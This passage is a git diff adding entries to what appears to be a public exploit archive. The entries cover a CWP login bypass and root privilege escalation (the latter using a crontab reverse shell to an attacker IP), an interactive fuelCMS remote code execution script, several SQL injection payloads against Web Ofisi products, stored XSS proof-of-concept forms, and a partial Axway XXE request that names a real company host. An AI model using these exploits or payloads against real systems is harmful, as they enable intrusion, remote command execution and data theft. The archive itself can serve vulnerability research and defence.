+Now execute the following curl command to submit a POST request with the contents of the 'xss.xml' file:
+
+curl -X POST -H 'Content-type: text/xml' -d @xss.xml --cookie "JSESSIONID=(A VALID SESSION ID)" http://(A VALID HOST):3052/agent/ppbe.xml
+
+Visiting the Event Action / Recipient page will execute the posted javascript code.
\ No newline at end of file
diff --git a/exploits/linux/webapps/47123.txt b/exploits/linux/webapps/47123.txt
new file mode 100644
index 000000000..1e529b047
--- /dev/null
+++ b/exploits/linux/webapps/47123.txt
@@ -0,0 +1,89 @@
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.847 Bypass Login
+# Date: 6 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: Not available, user panel only available for latest version
+# Version: 0.9.8.836 to 0.9.8.846
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13360, CVE-2019-13605
+
+# ====================================================================
+# Information
+# ====================================================================
+
+Product             : CWP Control Web Panel
+Vulnerability Name  : User panel bypass Login
+version             : 0.9.8.836
+Fixed on            : 0.9.8.848
+Test on             : CentOS 7.6.1810 (Core)
+Reference           : http://centos-webpanel.com/
+                    : https://control-webpanel.com/changelog
+CVE-Number          : CVE-2019-13605
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+After login success, the application will retuens base64 value and use it to authenticate again,
+That allow attacker to modify the response and become a user
+
+# ====================================================================
+# Response format (version 0.9.8.836 to 0.9.8.837)
+# ====================================================================
+
+<username>||/<username>/theme/original
+
+
+
+# CVE-2019-13360
+# ====================================================================
+# Steps to Reproduce Version 0.9.8.836 to 0.9.8.837
+# ====================================================================
+
+1. Login with valid username and invalid password
+2. Replace the target username in "<username>||/<username>/theme/original"
+3. Convert to base64
+4. Place the base64 value to HTTP response body
+5. Gain access to user area
+
+
+# CVE-2019-13605
+# ====================================================================
+# Steps to Reproduce Version 0.9.8.838 to 0.9.8.846
+# ====================================================================
+
+1. Create a testing environment
+	1.1 Create user as a target username
+	1.2 Login as the user
+	1.3 Save the HTTP response body (token value)
+2. Login to the real target with valid username and invalid password
+3. Place the value we saved from step 1.3 in HTTP response body
+4. Gain access to user area
+
+*The response value format is depends on version, just replace the hole value
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13360.md
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13605.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-07-07: Discovered the bug
+2019-07-07: Reported to vendor
+2019-07-07: Vender accepted the vulnerability
+2019-07-11: The vulnerability has been fixed
+2019-07-15: Advisory published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
\ No newline at end of file
diff --git a/exploits/linux/webapps/47124.txt b/exploits/linux/webapps/47124.txt
new file mode 100644
index 000000000..384b18481
--- /dev/null
+++ b/exploits/linux/webapps/47124.txt
@@ -0,0 +1,105 @@
+//====================================================================\\
+||                                                                     ||
+||           CWP Control Web Panel 0.9.8.836 - 0.9.8.839               ||
+||                     Root Privilege Escalation                       ||
+||                                                                     ||
+\\====================================================================//
+
+# ====================================================================
+# Information
+# ====================================================================
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation
+# Date: 6 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change
+version in the script)
+# Version: 0.9.8.836 to 0.9.8.839
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13359
+
+Product             : CWP Control Web Panel
+Vulnerability Name  : Root Privilege Escalation
+version             : 0.9.8.836
+Fixed on            : 0.9.8.840
+Test on             : Tested on: CentOS 7.6.1810 (Core)
+Reference           : http://centos-webpanel.com/
+                    : https://control-webpanel.com/changelog
+CVE-Number          : CVE-2019-13359
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+1. The session file are store at /tmp directory
+2. rkey value in the session file dose not change when access by the same source IP address
+
+
+
+# ====================================================================
+# Steps to Reproduce
+# ====================================================================
+
+Session prepareation state
+    1. Check the current IP address of attacker
+    2. Set the IP address on testing environment network
+    3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)
+    4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456"                  # we need "rkey"
+    5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)
+
+    * rkey is created from client ip, then do not change client ip when attack the real target
+
+Attack state
+
+    #
+    #   Method 1 Uploading via reverse shell
+    #
+
+    1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1"
+    2. Create session file through reverse shell
+
+        echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";" > /tmp/sess_123456
+
+    3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
+    4. Change file permission "chmod 664 /tmp/sess_123456"
+    5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
+    6. Open the URL and become the root user
+
+
+    #
+    # Method 2 Uploading via File manager function
+    #
+
+    1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
+    2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
+    3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
+    4. Open the URL and become the root user
+
+    *From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-06-30: Discovered the bug
+2019-06-30: Reported to vendor
+2019-06-30: Vender accepted the vulnerability
+2019-07-02: The vulnerability has been fixed
+2019-07-06: Published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
+Nissana Sirijirakal
+Narin Boonwasanarak
\ No newline at end of file
diff --git a/exploits/linux/webapps/47125.txt b/exploits/linux/webapps/47125.txt
new file mode 100644
index 000000000..b078c0268
--- /dev/null
+++ b/exploits/linux/webapps/47125.txt
@@ -0,0 +1,119 @@
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
+# Date: 15 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: Not available, user panel only available for lastest version
+# Version: 0.9.8.836 to 0.9.8.847
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13383
+
+# ====================================================================
+# Information
+# ====================================================================
+
+Product     : CWP Control Web Panel
+version     : 0.9.8.838
+Fixed on    : 0.9.8.848
+Test on     : CentOS 7.6.1810 (Core)
+Reference   : https://control-webpanel.com/
+CVE-Number  : 2019-13383
+
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+The server response different message between login with valid and invalid user.
+This allows attackers to check whether a username is valid by reading the HTTP response.
+
+
+
+# ====================================================================
+# Steps to Reproduce
+# ====================================================================
+
+1. Login with a random user by using invalid password
+
+POST /login/index.php?acc=validate HTTP/1.1
+Host: 192.168.80.137:2083
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+csrftoken: d41d8cd98f00b204e9800998ecf8427e
+X-Requested-With: XMLHttpRequest
+Content-Length: 30
+Connection: close
+Referer: https://192.168.80.137:2083/login/?acc=logon
+
+username=AAA&password=c2Rmc2Rm
+
+
+
+2. Check the HTTP response body
+
+2.1 User does not exist (server response suspended)
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+Date: Mon, 15 Jul 2019 01:39:06 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+X-Powered-By: PHP/7.0.32
+Content-Length: 9
+
+suspended
+
+
+2.2 User does exist (server response nothing)
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+Date: Mon, 15 Jul 2019 01:40:12 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+X-Powered-By: PHP/7.0.32
+Content-Length: 0
+
+
+
+3. HTTP response body format depends on software version, but all of them keep responding differently as the example below
+
+------------------------------------------------------------
+|  Username  |	 Password   |   Result                     |
+
+------------------------------------------------------------
+|  valid     |	 valid	    |   login success              |
+
+|  valid     |	 invalid    |	{"error":"failed"}         |
+
+|  invalid   |	 invalid    |	{"error":"user_invalid"}   |
+------------------------------------------------------------
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-07-06: Discovered the bug
+2019-07-06: Reported to vendor
+2019-07-06: Vender accepted the vulnerability
+2019-07-11: The vulnerability has been fixed
+2019-07-15: Published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
+Nissana Sirijirakal
+Narin Boonwasanarak
\ No newline at end of file
diff --git a/exploits/linux/webapps/47132.txt b/exploits/linux/webapps/47132.txt
new file mode 100644
index 000000000..ca5395135
--- /dev/null
+++ b/exploits/linux/webapps/47132.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
+# Date: 2019-07-17
+# Exploit Author: Sarath Nair aka AceNeon13
+# Contact: @AceNeon13
+# Vendor Homepage: www.oracle.com
+# Software Link: https://www.oracle.com/applications/siebel/
+# Version: Siebel CRM (UI Framework) Version 19.0 and prior
+# CVE: N/A
+# Greetings: Deepu.tv
+
+# PoC Exploit: Persistent Cross Site Scripting by Insecure File Upload
+-----------------------------------------------------------------------
+Vulnerable URL: http://<Siebel_Application>/finsadm_enu/start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View
+
+#Steps to exploit the issue:
+#1. Login to the CRM application and navigate to ‘Activities’ and click on ‘All Activities’.
+#2. Edit one of the existing activity, or create a new one.
+#3. Use the ‘New File’ menu in ‘attachments’ section to upload an HTML file with JavaScript payload (via a proxy tool).
+#4. JavaScript payload will be triggered/rendered upon the victim user views the attached file.
+
+# Description: The Siebel CRM application allows its users to upload any file types in most of the available file upload functionalities, later on, the uploaded file can be downloaded by another user with the appropriate privileges as part of the workflow. As such, it was possible to upload file with the “html” extension, (containing html and JavaScript code) thereby allowing to also perform Persistent Cross Site Scripting attack. 
+# Impact: Cross-Site Scripting attacks do not target the server but rather its users. A hypothetical attacker could use the web server in order to trick other users into unwillingly executing malicious code saved on the server with XSS payload. The impacts of such attack can range from the disclosure of the user’s sensitive information to execution of arbitrary code on the target user’s system.
+# Solution: Apply the Oracle Siebel CRM patch released on 16 July 2019
+
+########################################
+# Vulnerability Disclosure Timeline:
+2017-December-23:  Discovered vulnerability
+2017-December-25:  Vendor Notification
+2017-December-27:  Vendor Response/Feedback
+2019-July-16:  Vendor Fix/Patch
+2019-July-17:  Public Disclosure
+########################################
+
+Warm regards,
+Sarath Nair
\ No newline at end of file
diff --git a/exploits/linux/webapps/47136.txt b/exploits/linux/webapps/47136.txt
new file mode 100644
index 000000000..aaf5b16db
--- /dev/null
+++ b/exploits/linux/webapps/47136.txt
@@ -0,0 +1,102 @@
+# Exploit Title: WordPress Plugin OneSignal 1.17.5 - Persistent Cross-Site Scripting
+# Date: 2019-07-18
+# Vendor Homepage: https://www.onesignal.com
+# Software Link:  https://wordpress.org/plugins/onesignal-free-web-push-notifications/
+# Affected version: 1.17.5
+# Exploit Author: LiquidWorm
+# Tested on: Linux
+
+Summary: OneSignal is a high volume and reliable push notification service
+for websites and mobile applications. We support all major native and mobile
+platforms by providing dedicated SDKs for each platform, a RESTful server API,
+and an online dashboard for marketers to design and send push notifications.
+
+Desc: The application suffers from an authenticated stored XSS via POST request.
+The issue is triggered when input passed via the POST parameter 'subdomain' is
+not properly sanitized before being returned to the user. This can be exploited
+to execute arbitrary HTML and script code in a user's browser session in context
+of an affected site.
+
+Tested on: WordPress 5.2.2
+           Apache/2.4.39
+           PHP/7.1.30
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5530
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php
+
+<html>
+  <body>
+  <script>history.pushState('', 'SHPA', '/')</script>
+    <form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
+      <input type="hidden" name="onesignal_config_page_nonce" value="f7fae30a4f" />
+      <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
+      <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc16-a8a6df479515" />
+      <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl" />
+      <input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
+      <input type="hidden" name="safari_web_id" value="" />
+      <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
+      <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
+      <input type="hidden" name="persist_notifications" value="platform-default" />
+      <input type="hidden" name="notification_title" value="hACKME" />
+      <input type="hidden" name="notifyButton_enable" value="true" />
+      <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
+      <input type="hidden" name="notifyButton_prenotify" value="true" />
+      <input type="hidden" name="notifyButton_showcredit" value="true" />
+      <input type="hidden" name="notifyButton_customize_enable" value="true" />
+      <input type="hidden" name="notifyButton_size" value="medium" />
+      <input type="hidden" name="notifyButton_position" value="bottom-right" />
+      <input type="hidden" name="notifyButton_theme" value="default" />
+      <input type="hidden" name="notifyButton_offset_bottom" value="" />
+      <input type="hidden" name="notifyButton_offset_left" value="" />
+      <input type="hidden" name="notifyButton_offset_right" value="" />
+      <input type="hidden" name="notifyButton_color_background" value="" />
+      <input type="hidden" name="notifyButton_color_foreground" value="" />
+      <input type="hidden" name="notifyButton_color_badge_background" value="" />
+      <input type="hidden" name="notifyButton_color_badge_foreground" value="" />
+      <input type="hidden" name="notifyButton_color_badge_border" value="" />
+      <input type="hidden" name="notifyButton_color_pulse" value="" />
+      <input type="hidden" name="notifyButton_color_popup_button_background" value="" />
+      <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
+      <input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
+      <input type="hidden" name="notifyButton_color_popup_button_color" value="" />
+      <input type="hidden" name="notifyButton_message_prenotify" value="" />
+      <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
+      <input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
+      <input type="hidden" name="notifyButton_tip_state_blocked" value="" />
+      <input type="hidden" name="notifyButton_message_action_subscribed" value="" />
+      <input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
+      <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
+      <input type="hidden" name="notifyButton_dialog_main_title" value="" />
+      <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
+      <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
+      <input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
+      <input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
+      <input type="hidden" name="prompt_customize_enable" value="true" />
+      <input type="hidden" name="prompt_action_message" value="" />
+      <input type="hidden" name="prompt_auto_accept_title" value="" />
+      <input type="hidden" name="prompt_site_name" value="" />
+      <input type="hidden" name="prompt_example_notification_title_desktop" value="" />
+      <input type="hidden" name="prompt_example_notification_message_desktop" value="" />
+      <input type="hidden" name="prompt_example_notification_title_mobile" value="" />
+      <input type="hidden" name="prompt_example_notification_message_mobile" value="" />
+      <input type="hidden" name="prompt_example_notification_caption" value="" />
+      <input type="hidden" name="prompt_accept_button_text" value="" />
+      <input type="hidden" name="prompt_cancel_button_text" value="" />
+      <input type="hidden" name="send_welcome_notification" value="true" />
+      <input type="hidden" name="welcome_notification_title" value="" />
+      <input type="hidden" name="welcome_notification_message" value="" />
+      <input type="hidden" name="welcome_notification_url" value="" />
+      <input type="hidden" name="notification_on_post" value="true" />
+      <input type="hidden" name="utm_additional_url_params" value="" />
+      <input type="hidden" name="allowed_custom_post_types" value="" />
+      <input type="hidden" name="custom_manifest_url" value="" />
+      <input type="hidden" name="show_notification_send_status_message" value="true" />
+      <input type="submit" value="Send" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/linux/webapps/47138.py b/exploits/linux/webapps/47138.py
new file mode 100755
index 000000000..971baab76
--- /dev/null
+++ b/exploits/linux/webapps/47138.py
@@ -0,0 +1,34 @@
+# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
+# Date: 2019-07-19
+# Exploit Author: 0xd0ff9
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+
+import requests
+import urllib
+
+url = "http://127.0.0.1:8881"
+def find_nth_overlapping(haystack, needle, n):
+    start = haystack.find(needle)
+    while start >= 0 and n > 1:
+        start = haystack.find(needle, start+1)
+        n -= 1
+    return start
+
+while 1:
+	xxxx = raw_input('cmd:')
+	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
+	proxy = {"http":"http://127.0.0.1:8080"}
+	r = requests.get(burp0_url, proxies=proxy)
+
+	html = "<!DOCTYPE html>"
+	htmlcharset = r.text.find(html)
+
+	begin = r.text[0:20]
+	dup = find_nth_overlapping(r.text,begin,2)
+
+	print r.text[0:dup]
\ No newline at end of file
diff --git a/exploits/linux/webapps/47139.txt b/exploits/linux/webapps/47139.txt
new file mode 100644
index 000000000..b8d7f16b9
--- /dev/null
+++ b/exploits/linux/webapps/47139.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html
+# Demo Site: http://demobul.net/eticaretv3/
+# Version: v3
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/ara.html?a=
+Vulnerable Parameter: a (GET)
+Payload: e%' AND 3*2*1=6 AND '0002ZIf'!='0002ZIf%
\ No newline at end of file
diff --git a/exploits/linux/webapps/47140.txt b/exploits/linux/webapps/47140.txt
new file mode 100644
index 000000000..57c3fdb22
--- /dev/null
+++ b/exploits/linux/webapps/47140.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html
+# Demo Site: http://demobul.net/eticaretv5/
+# Version: v5
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/arama?kategori=&q=
+Vulnerable Parameter: q (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/ajax/productsFilterSearch
+Vulnerable Parameter: q (POST)
+Payload:
+kategori=&pageType=arama&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&sayfa=1
\ No newline at end of file
diff --git a/exploits/linux/webapps/47141.txt b/exploits/linux/webapps/47141.txt
new file mode 100644
index 000000000..d3bf8ec78
--- /dev/null
+++ b/exploits/linux/webapps/47141.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html
+# Demo Site: http://demobul.net/emlakv2/
+# Version: v2
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/ara.html?ara=
+Vulnerable Parameter: ara (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47142.txt b/exploits/linux/webapps/47142.txt
new file mode 100644
index 000000000..d238692fb
--- /dev/null
+++ b/exploits/linux/webapps/47142.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html
+# Demo Site: http://demobul.net/emlakv3/
+# Version: V2
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: emlak_durumu (GET)
+Payload: -1' OR 3*2*1=6 AND 000744=000744 --
+
+----- PoC 2: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: emlak_tipi (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 3: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: il (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 4: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: ilce (GET)
+Payload: -1' OR 3*2*1=6 AND 000397=000397 --
+
+----- PoC 5: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: kelime (GET)
+Payload: -1' OR 3*2*1=6 AND 000397=000397 --
+
+----- PoC 6: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: semt (GET)
+Payload: -1' OR 3*2*1=6 AND 000531=000531 --
\ No newline at end of file
diff --git a/exploits/linux/webapps/47143.txt b/exploits/linux/webapps/47143.txt
new file mode 100644
index 000000000..c166342a0
--- /dev/null
+++ b/exploits/linux/webapps/47143.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html
+# Demo Site: http://demobul.net/firma-rehberi-v1/
+# Version: v1
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request:
+http://localhost/[PATH]/firmalar.html?il=0&kat=&kelime=&siralama=yeni
+Vulnerable Parameters: il,kelime,kat (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47144.txt b/exploits/linux/webapps/47144.txt
new file mode 100644
index 000000000..b0f169f23
--- /dev/null
+++ b/exploits/linux/webapps/47144.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
+# Demo Site: http://demobul.net/rentacarv3/
+# Version: v3
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: kategori[] (GET)
+Payload: if(now()=sysdate(),sleep(0),0)
+
+----- PoC 2: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: klima[] (GET)
+Payload: 1 AND 3*2*1=6 AND 695=695
+
+----- PoC 3: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: vites[] (GET)
+Payload: 1 AND 3*2*1=6 AND 499=499
+
+----- PoC 4: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: vites[] (GET)
+Payload: 1 AND 3*2*1=6 AND 499=499
+
+----- PoC 5: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: yakit[] (GET)
+Payload: 1 AND 3*2*1=6 AND 602=602
\ No newline at end of file
diff --git a/exploits/linux/webapps/47145.txt b/exploits/linux/webapps/47145.txt
new file mode 100644
index 000000000..b6da6ab60
--- /dev/null
+++ b/exploits/linux/webapps/47145.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html
+# Demo Site: http://demobul.net/firmav13/
+# Version: v13
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1
+Vulnerable Parameters: oz[] (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47150.txt b/exploits/linux/webapps/47150.txt
new file mode 100644
index 000000000..ecc1a3919
--- /dev/null
+++ b/exploits/linux/webapps/47150.txt
@@ -0,0 +1,208 @@
+# Title: Axway SecureTransport 5 - Unauthenticated XML Injection
+# Google Dork: intitle:"Axway SecureTransport" "Login"
+# Date: 2019-07-20
+# Author: Dominik Penner / zer0pwn of Underdog Security
+# Vendor Homepage: https://www.axway.com/en
+# Software Link: https://docs.axway.com/bundle/SecureTransport_54_AdministratorGuide_allOS_en_HTML5/page/Content/AdministratorsGuide/overview/overview.htm
+# Version: 5.x
+# CVE: N/A
+				                     _       _ 
+				  _______ _ __ ___  | | ___ | |
+				 |_  / _ \ '__/ _ \ | |/ _ \| |
+				  / /  __/ | | (_) || | (_) | |
+				 /___\___|_|  \___(_)_|\___/|_|
+				    	  https://zero.lol
+				 	      zero days 4 days
+
+
+				ATTENTION:
+
+				this is a friendly neighborhood zeroday drop
+				                               
+
+
+
+"Axway SecureTransport is a multi-protocol MFT gateway for securing, managing, and tracking file flows among people and applications inside your enterprise, and beyond your firewall to your user communities, the cloud and mobile devices. It is designed to handle everything — from high-volume automated high speed secure file transfers between systems, sites, lines of business and external partners, to user-driven communications and mobile, folder- and portal-based file sharing."
+
+Who uses this software?
+
+Well, to name a few... (just use the dork dude)
+- Government of California
+- Biometrics.mil
+- Fleetcor
+- Costco
+- Boeing
+- IRS
+
+
+Description:
+Axway SecureTransport versions 5.3 through 5.0 (and potentially others) are vulnerable to an unauthenticated blind XML injection (& XXE) vulnerability in the resetPassword functionality via the REST API. If executed properly, this vulnerablity can lead to local file disclosure, DOS or URI invocation attacks (e.g SSRF->RCE). It's worth noting that in version 5.4 the v1 API was deprecated... but not removed entirely. Meaning that you can still trigger this vulnerability on updated installations if they have the v1.0, v1.1, v1.2 or v1.3 in the /api/ directory.
+
+
+Reproduction:
+
+1. Breaking the parser.
+
+	HTTP Request:
+	```
+	POST /api/v1.0/myself/resetPassword HTTP/1.1
+	Host: securefile.costco.com
+	Content-Type: application/xml
+	Referer: localhost
+
